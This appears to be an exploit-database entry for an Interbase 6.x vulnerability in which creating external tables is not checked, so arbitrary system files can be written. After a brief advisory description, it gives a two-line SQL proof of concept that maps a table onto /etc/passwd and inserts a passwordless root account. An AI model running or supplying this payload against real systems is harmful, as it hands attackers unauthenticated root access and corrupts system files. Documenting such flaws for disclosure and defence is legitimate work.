Interbase 6.x - External Table File Verification

Author: Kotala Zdenek
type: remote
platform: multiple
port: 
date_added: 2003-04-05 
date_updated: 2012-11-03 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7291/info

A vulnerability has been reported for Interbase that may result in the corruption of arbitrary system files. The vulnerability exists due to insufficient checks performed when creating or manipulating external databases.

create table test external '/etc/passwd' (id char(80));
insert into test values('r00t::0:0:root:/root:/bin/bash');